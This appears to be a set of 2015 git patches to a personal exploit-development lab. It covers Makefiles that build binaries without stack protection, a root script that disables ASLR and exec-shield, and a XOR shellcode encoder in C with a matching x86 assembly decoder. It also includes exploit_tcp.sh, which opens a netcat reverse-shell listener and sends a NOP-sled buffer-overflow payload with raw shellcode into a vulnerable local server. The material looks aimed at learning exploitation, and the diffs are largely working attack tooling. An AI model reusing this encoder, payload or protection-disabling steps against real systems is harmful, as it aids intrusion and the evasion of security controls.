From 2b537a4601ae623346d70090455e487047e90a70 Mon Sep 17 00:00:00 2001 From: toni Date: Sun, 1 Mar 2015 14:28:51 +0100 Subject: - fixed wrong target subst --- Makefile | 34 ++++++++-------------------------- 1 file changed, 8 insertions(+), 26 deletions(-) diff --git a/Makefile b/Makefile index 7ae222c..dbb5a92 100644 --- a/Makefile +++ b/Makefile @@ -9,11 +9,11 @@ OCFLAGS = -z execstack -fno-stack-protector X86_FLAGS = -m32 -mpreferred-stack-boundary=2 X64_FLAGS = -m64 -mpreferred-stack-boundary=4 SOURCES = $(wildcard *.c) -TARGETS = $(patsubst %.c,%.o,$(SOURCES)) +TARGETS = $(patsubst %.c,%,$(SOURCES)) -all: $(SOURCES) $(TARGETS) shellcode crypter post-build +all: $(TARGETS) shellcode crypter -main: $(SOURCES) $(TARGETS) +main: $(TARGETS) shellcode: $(MAKE) -C shellcode all @@ -21,33 +21,15 @@ shellcode: crypter: $(MAKE) -C crypter all -post-build: - @read -p "disable protection stuff? (y/N) " answ; \ - if [ "x$$answ" != "xy" ]; then \ - echo "abort .."; \ - return 0; \ - else \ - ./disable_prot.sh; \ - fi - -disable-prot: - if [ `cat /proc/sys/kernel/randomize_va_space` -eq 0 ]; then \ - echo "not necessary to run ./disable_prot.sh"; \ - else \ - ./disable_prot.sh; \ - fi - -%.o : %.c - $(CC) $(CFLAGS) $(X86_FLAGS) $(OCFLAGS) -o $(patsubst %.o,%,$@) $< +% : %.c + $(CC) $(CFLAGS) $(X86_FLAGS) $(OCFLAGS) -o $@ $< ifeq ($(LBITS),64) - -$(CC) $(CFLAGS) $(X64_FLAGS) $(OCFLAGS) -o $(patsubst %.o,%,$@)_x64 $< + -$(CC) $(CFLAGS) $(X64_FLAGS) $(OCFLAGS) -o $@_x64 $< endif - ln -s $< $@ clean: - $(RM) -f $(patsubst %.o,%,$(TARGETS)) $(patsubst %.c,%_x64,$(wildcard *.c)) - $(RM) -f $(TARGETS) + $(RM) -f $(TARGETS) $(patsubst %,%_x64,$(TARGETS)) $(MAKE) -C crypter clean $(MAKE) -C shellcode clean -.PHONY: shellcode crypter clean +.PHONY: all main shellcode crypter clean -- cgit v1.2.3 From 1bfe1303d5cc2bfb2d925f00d7d18a5950c2f4ec Mon Sep 17 00:00:00 2001 From: toni Date: Sun, 1 Mar 2015 14:29:57 +0100 Subject: - readlink should do the trick --- disable_prot.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/disable_prot.sh b/disable_prot.sh index 15e8137..54cc3be 100755 --- a/disable_prot.sh +++ b/disable_prot.sh @@ -1,9 +1,9 @@ #!/bin/bash if [ `id -u` -ne 0 ]; then - echo "$0: This program should be run as root" + echo "$0: This script should be run as root" echo "$0: Try to get root .." - su -l root -c "$(realpath $0)" + su -l root -c "$(readlink -f $0)" exit $? fi -- cgit v1.2.3 From 4ba94d8232cdb61b8e07c4a80197d9f704620ffb Mon Sep 17 00:00:00 2001 From: toni Date: Wed, 4 Mar 2015 10:00:07 +0100 Subject: - added PAE check --- disable_prot.sh | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/disable_prot.sh b/disable_prot.sh index 54cc3be..dba1bc0 100755 --- a/disable_prot.sh +++ b/disable_prot.sh @@ -1,12 +1,19 @@ #!/bin/bash if [ `id -u` -ne 0 ]; then - echo "$0: This script should be run as root" + echo "$0: This script should be run as root." echo "$0: Try to get root .." su -l root -c "$(readlink -f $0)" exit $? fi +cat /proc/cpuinfo | grep -oq pae 2>/dev/null >/dev/null +ret=$? +if [ $ret -eq 0 ]; then + echo "$0: PAE enabled system found." + echo "$0: Some exploits will not work!" +fi + sysctl -w kernel.randomize_va_space=0 2>/dev/null sysctl -w kernel.exec-shield=0 2>/dev/null echo "done." -- cgit v1.2.3 From 15fbdd7e155e5181de6a82c34e419488bc9626d0 Mon Sep 17 00:00:00 2001 From: toni Date: Wed, 4 Mar 2015 18:59:52 +0100 Subject: - Makefile: new target 'debug' --- Makefile | 7 +++++-- crypter/Makefile | 7 ++++--- 2 files changed, 9 insertions(+), 5 deletions(-) diff --git a/Makefile b/Makefile index dbb5a92..145ddf4 100644 --- a/Makefile +++ b/Makefile @@ -4,8 +4,8 @@ RM := rm CC := gcc STRIP := strip LBITS := $(shell getconf LONG_BIT) -CFLAGS = -Wall -g -OCFLAGS = -z execstack -fno-stack-protector +CFLAGS += -Wall +OCFLAGS += -z execstack -fno-stack-protector X86_FLAGS = -m32 -mpreferred-stack-boundary=2 X64_FLAGS = -m64 -mpreferred-stack-boundary=4 SOURCES = $(wildcard *.c) @@ -15,6 +15,9 @@ all: $(TARGETS) shellcode crypter main: $(TARGETS) +debug: + $(MAKE) -C . CFLAGS="-g" + shellcode: $(MAKE) -C shellcode all diff --git a/crypter/Makefile b/crypter/Makefile index f64183f..db2b296 100644 --- a/crypter/Makefile +++ b/crypter/Makefile @@ -4,7 +4,7 @@ CC := gcc LD := ld XXD := xxd ASMFLAGS = -g -CFLAGS ?= -Wall -fpic -Os +CFLAGS += -fpic -Os X86_FLAGS := -m32 X64_FLAGS := -m64 LDFLAGS ?= @@ -27,8 +27,8 @@ ifneq ($(SCC),yes) $(error Please run 'make' first in the main directory) endif @echo "generating header $(patsubst %.c,%.h,$<) for target $<" - -$(shell $(SCDIR)/sc-test -p $(SUBDIR)/`cat "$<" | sed -n 's/.*#DECODER=//p'` | sed 's/shellcode/decoder/' > $(patsubst %.o,%.h,$@)) - -$(shell $(SCDIR)/sc-test -p $(SUBDIR)/`cat "$<" | sed -n 's/.*#SHELLCODE=//p'` >> $(patsubst %.o,%.h,$@)) + -$(shell $(SCDIR)/sc-test -p $(SUBDIR)/`cat "$<" | sed -n 's/.*#DECODER=//p'` | sed 's/shellcode/decoder/' > $(patsubst %.c,%.h,$<)) + -$(shell $(SCDIR)/sc-test -p $(SUBDIR)/`cat "$<" | sed -n 's/.*#SHELLCODE=//p'` >> $(patsubst %.c,%.h,$<)) $(CC) $(CFLAGS) $(X86_FLAGS) -D_USE_CFG -o $(patsubst %.c,%,$<) $< ifeq ($(LBITS),64) $(CC) $(CFLAGS) $(X64_FLAGS) -D_USE_CFG -o $(patsubst %.c,%_x64,$<) $< @@ -36,6 +36,7 @@ endif clean: $(RM) -f $(patsubst %.c,%,$(SOURCES_C)) $(patsubst %.c,%_x64,$(SOURCES_C)) + $(RM) -f $(patsubst %.c,%.h,$(SOURCES_C)) $(RM) -f $(patsubst %.asm,%.o,$(SOURCES_ASM)) .PHONY: all clean -- cgit v1.2.3 From 38a95058a7f521e465f5977bcbbdac1a74b30f31 Mon Sep 17 00:00:00 2001 From: toni Date: Wed, 4 Mar 2015 19:00:25 +0100 Subject: - xor2_decoder wip - exploit_tcp: screen uses null cfg file --- crypter/xor2_decoder.asm | 63 ++++++++++++++++++----- crypter/xor2_encoder.c | 129 ++++++++++++++++++++++++++++++----------------- exploit_tcp.sh | 3 +- 3 files changed, 136 insertions(+), 59 deletions(-) diff --git a/crypter/xor2_decoder.asm b/crypter/xor2_decoder.asm index cc102b2..93bdedf 100644 --- a/crypter/xor2_decoder.asm +++ b/crypter/xor2_decoder.asm @@ -1,22 +1,61 @@ BITS 32 +; plain x86 | trailer +; --------------------------------------------------------------------------------------------- +; | decoder | 2 byte shellcode len | 1 byte xor key len | xor key (xor key len) | shellcode | +; ----------------[XOR ENCODED]--------------------------------------------------[XOR ENCODED]- +; | Reg: cx | Reg: dl | [esi]+3+dh | [esi]+3+dl+ebx + jmp short go next: -pop esi ; stackpointer -> start+len(encoder) -xor ecx,ecx ; zero out some regs -xor eax,eax +pop esi ; get stackpointer := start+sizeof(decoder) + +xor ecx,ecx +mov word cx,[esi] ; shellcode len (encoded) +xor word cx,0x0101 ; decode shellcode len + +; dh := xor pad +; dl := xor key len xor edx,edx -mov cl,0 ; buffer length -mov dl,4 ; xor padding +mov byte dl,[esi+2] + +xor ebx,ebx ; zero out change: -xor byte [esi + ecx],0 -mov byte al,[esi + ecx] -dec cl -jnz done ; no more bytes left -dec dh -jnz change -mov dh,dl +; calc memory location +mov eax,esi +push dword eax +add dword [esp],0x3 ; shellcode len (2 bytes) + xor key len (1 byte) +movzx eax,dl +add [esp],eax +add [esp],ebx +pop dword eax ; eax holds the pointer to our next encoded byte + +mov edi,eax + +mov eax,esi ; <----- DBG +push dword eax +add dword [esp],0x3 ; see above +movzx eax,dh +add [esp],eax +pop dword eax ; al holds the xor 1-byte-pad +; TODO: not rly efficient, change it! +push dword esi ; save our trailer pointer +mov esi,[eax] +xor eax,eax +mov byte al,esi +pop dword esi ; get our trailer pointer + +xor byte [edi],al + +inc ebx +cmp ebx,ecx +je done ; no more bytes left + +inc dh ; next xor 1-byte-pad +cmp dh,dl ; check if xor pad == xor len +jne change +xor byte dh,dh jmp change done: diff --git a/crypter/xor2_encoder.c b/crypter/xor2_encoder.c index cc46592..fc3f904 100644 --- a/crypter/xor2_encoder.c +++ b/crypter/xor2_encoder.c @@ -1,4 +1,4 @@ -// #DECODER=./xor_decoder.o +// #DECODER=./xor2_decoder.o // #SHELLCODE=../shellcode/hello.o #define _GNU_SOURCE 1 @@ -6,7 +6,10 @@ #include #include #include +#include #include +#include +#include #ifdef _USE_CFG #include "xor2_encoder.h" @@ -14,17 +17,17 @@ #error "xor2_encoder.h config file missing including decoder && shellcode" #endif -#ifndef _CRYPTVAL -#define _CRYPTVAL 0xff -#endif +#define XOR_KEYLEN 5 +#define SCLEN_XORKEY 0x0101 +#define TRAILER 3 #ifndef _OUTFILE #define _OUTFILE "xor2_encoded.o" #endif -int -getnumber(int n) +long int +getnumber(long int n) { int seed; struct timeval tm; @@ -36,11 +39,11 @@ getnumber(int n) } void -print_code(const char *name, char *data, int len) +print_code(const char *name, char *data, size_t len) { int i,l = 15; - printf("unsigned long int l%s = %lu;\nchar %s[] = \n", name, (unsigned long int) strlen(data), name); + printf("unsigned long int l%s = %lu;\nchar %s[] = \n", name, (unsigned long int) len, name); for (i = 0; i < len; i++) { if (l >= 15) { if (i) { @@ -55,6 +58,52 @@ print_code(const char *name, char *data, int len) printf("\";\n\n"); } +long int +eof_check(char *data, size_t len) +{ + long int i; + + for (i = 0; i < len; i++) { + if ( *(char *)(data + i) == '\0' ) { + return i; + } + } + return -1; +} + +char * +xor_genkey(size_t keylen) +{ + char *key; + long int kd, rnd; + int i = 0; + + key = calloc(sizeof(char), keylen); + while (i+sizeof(long int) < keylen) { + rnd = getnumber(LONG_MAX); + memcpy(&key[i], &rnd, sizeof(long int)); + i += sizeof(long int); + } + kd = keylen - i; + if ( kd != 0 ) { + rnd = getnumber(LONG_MAX); + memcpy(&key[i], &rnd, kd); + } + return key; +} + +void +xor_encrypt(char *buf, size_t buflen, char *key, size_t keylen) +{ + int i; + unsigned char xb; + + for (i = 0; i < buflen; i++) { + xb = key[i % keylen]; + buf[i] ^= xb; + } +} + void err_n_xit(const char *exit_msg, const char *arg) { @@ -74,66 +123,54 @@ err_n_xit(const char *exit_msg, const char *arg) int main(int argc, char **argv) { - int i, npos = 0, number = getnumber(_CRYPTVAL), nullbyte = 0; + int nullbyte = 0; + long int nb_idx; int ldecoder = sizeof(decoder)-1; /* last byte is '\x00' */ - int lshellcode = sizeof(shellcode)-1; /* same as above */ - int first_arg = 1; - char *result; + uint16_t lshellcode = (uint16_t) sizeof(shellcode)-1; /* same as above */ + char *result, *mod_decoder, *xor_key; FILE *outfile; - printf("/* Using value %d to encode the shellcode. */\n", number); printf("/* PRINT SHELLCODE */\n"); print_code("shellcode", shellcode, lshellcode); printf("/* PRINT DECODER */\n"); print_code("decoder", decoder, ldecoder); - for (i = 0; i < ldecoder; i++) { - if (decoder[i] == '\x00') { - if (first_arg) { - decoder[i] = lshellcode; - first_arg = 0; - } else { - decoder[i] = (unsigned char) number; - npos = i; - } - printf("// decoder[%d] = %u (%02x)\n", i, (unsigned char) decoder[i], (unsigned char) decoder[i]); - } + mod_decoder = malloc(ldecoder + TRAILER); // buffer size (2 bytes) + xor key len (1 byte) + memcpy(mod_decoder, decoder, ldecoder); + *(uint16_t *) (&mod_decoder[ldecoder]) = (uint16_t) (lshellcode ^ SCLEN_XORKEY); + *(uint8_t *) (&mod_decoder[ldecoder+2]) = (uint8_t) XOR_KEYLEN; + printf("/* shellcode length: decoder[%u] = %u bytes ^ 0x%04x = 0x%04x */\n", lshellcode, mod_decoder[ldecoder], SCLEN_XORKEY, *(uint16_t *) &mod_decoder[ldecoder]); + printf("/* xor key length: decoder[%u] = %u bytes = 0x%02x */\n", ldecoder+2, mod_decoder[ldecoder+2], mod_decoder[ldecoder+2]); + + if ( (nb_idx = eof_check(mod_decoder , ldecoder+3)) != -1) { + printf("NULLBYTE DETECTED: decoder+0x%04x (%lu)\n", (unsigned int) nb_idx, nb_idx); + exit(-1); } - printf("\n"); - result = malloc(lshellcode); + result = calloc(ldecoder + lshellcode + TRAILER + XOR_KEYLEN, sizeof(char)); + printf("/* total length = %d */\n", ldecoder + lshellcode + TRAILER + XOR_KEYLEN); + memcpy(result, mod_decoder, ldecoder + TRAILER); + free(mod_decoder); do { - memcpy(result, shellcode, lshellcode); + xor_key = xor_genkey(XOR_KEYLEN); + memcpy(result + ldecoder + TRAILER, xor_key, XOR_KEYLEN); + memcpy(result + ldecoder + TRAILER + XOR_KEYLEN, shellcode, lshellcode); + xor_encrypt(result + ldecoder + TRAILER + XOR_KEYLEN, lshellcode, xor_key, XOR_KEYLEN); + print_code("xor", xor_key, XOR_KEYLEN); if (nullbyte == 1) { - number = getnumber(_CRYPTVAL); - fprintf(stderr, "New crypt value: %d (%02x)\n", number, number); - decoder[npos] = number; nullbyte = 0; } - for (i = 0; i < lshellcode; i++) { - result[i] ^= number; - if (result[i] == '\x00') { - nullbyte = 1; - fprintf(stderr, "Recode!\n"); - break; - } - } + free(xor_key); } while (nullbyte == 1); - memcpy(shellcode, result, lshellcode); - free(result); - result = malloc(ldecoder + lshellcode + 1); - memcpy(result, (const void *) decoder, ldecoder); - memcpy(result + ldecoder, shellcode, lshellcode); - *(result + ldecoder + lshellcode) = '\0'; - print_code("result", result, ldecoder + lshellcode); + print_code("result", result, ldecoder + lshellcode + TRAILER + XOR_KEYLEN); /* write2file */ outfile = fopen(_OUTFILE, "w+b"); if (outfile == NULL) err_n_xit("fopen", _OUTFILE); - if (fwrite((void *) result, sizeof(char), strlen(result), outfile) != strlen(result)) err_n_xit("fwrite", _OUTFILE); + if (fwrite((void *) result, sizeof(char), ldecoder + lshellcode + TRAILER + XOR_KEYLEN, outfile) != (ldecoder + lshellcode + TRAILER + XOR_KEYLEN)) err_n_xit("fwrite", _OUTFILE); if (fclose(outfile) != 0) err_n_xit("fclose", _OUTFILE); fprintf(stderr, "outfile: %s\n", _OUTFILE); diff --git a/exploit_tcp.sh b/exploit_tcp.sh index 106489d..aecfe2c 100755 --- a/exploit_tcp.sh +++ b/exploit_tcp.sh @@ -7,7 +7,7 @@ # 79xNOP (0x90) + shellcode + 79xNOP (0x90) + return addr echo "starting netcat reverse tcp server .." -screen -d -m -S overcat /bin/netcat -l -s 127.0.0.1 -p 4444 +screen -c /dev/null -d -m -S overcat /bin/netcat -l -s 127.0.0.1 -p 4444 sleep 1 echo "starting exploitable tcp server .." ./overflow_tcp & @@ -25,5 +25,6 @@ python -c 'print "\x90"*79 + \ "\x29\x3e\x5d\x96\xe6\xc9\x40\xa7\x02\x07\x02\xf9\xcf\xfd" + \ "\x03\xa2\x22\x81" + \ "\x90"*83 + "\x9d\xd4\xff\xff"' | nc -q 0 "$host" 3000 +read -p "[PRESS RETURN TO CONTINUE]" screen -R overcat -- cgit v1.2.3